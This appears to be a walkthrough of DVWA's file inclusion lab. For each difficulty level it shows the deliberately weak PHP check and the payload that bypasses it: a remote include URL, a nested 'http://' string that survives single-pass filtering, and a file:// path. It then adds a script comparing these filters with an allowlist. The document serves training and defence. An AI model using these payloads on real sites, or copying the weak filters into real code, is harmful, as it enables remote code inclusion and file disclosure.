1. Low level
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>
Analysis: no filtering at all.
Solution: ?page=http://xx.xx.xx.xx/1.txt
2. Medium level
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );

?>
Analysis: the filter strips http://, https://, ../ and ..\ in a single pass, so nesting one pattern inside another gets through.
Solution: ?page=hthttp://tp://xx.xx.xx.xx/1.txt
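3. High level
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>
Analysis: the fnmatch() function matches a filename or string against the specified pattern. Here the pattern only requires the value to start with "file", so a file:// URL passes.
Solution: file://D://1.txt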
4. Impossible level
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>
Analysis: this uses a whitelist; the value passed in must be one of these names.
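The script below is an added example, not DVWA's own code. It runs the medium and high checks from this page against the inputs shown above and compares them with an allowlist lookup in the spirit of the impossible level. The function names medium_filter, high_accepts and resolve_page are hypothetical.

```php
<?php
// Added example, not DVWA code. Function names are hypothetical.

// Medium-level filter from this page: each pattern is removed in one pass,
// and the result is never re-scanned.
function medium_filter(string $file): string {
    $file = str_replace(array("http://", "https://"), "", $file);
    $file = str_replace(array("../", "..\\"), "", $file);
    return $file;
}

// High-level check from this page: true when the request would be allowed.
function high_accepts(string $file): bool {
    return fnmatch("file*", $file) || $file == "include.php";
}

// Allowlist lookup: the request value is only a key into a fixed map and
// never becomes part of a path or URL. Returns null for unknown keys.
function resolve_page(string $page): ?string {
    $pages = array(
        "include.php" => __DIR__ . "/include.php",
        "file1.php"   => __DIR__ . "/file1.php",
        "file2.php"   => __DIR__ . "/file2.php",
        "file3.php"   => __DIR__ . "/file3.php",
    );
    return $pages[$page] ?? null;
}

// Inputs taken from this page, plus one legitimate value.
$samples = array(
    "file1.php",
    "hthttp://tp://xx.xx.xx.xx/1.txt",
    "file://D://1.txt",
);

foreach ($samples as $s) {
    printf("input:          %s\n", $s);
    printf("  medium gives: %s\n", medium_filter($s));
    printf("  high accepts: %s\n", var_export(high_accepts($s), true));
    printf("  allowlist:    %s\n", var_export(resolve_page($s), true));
}
```

With allow_url_include left at its default of Off in php.ini, include also refuses http:// URLs, independent of the input check.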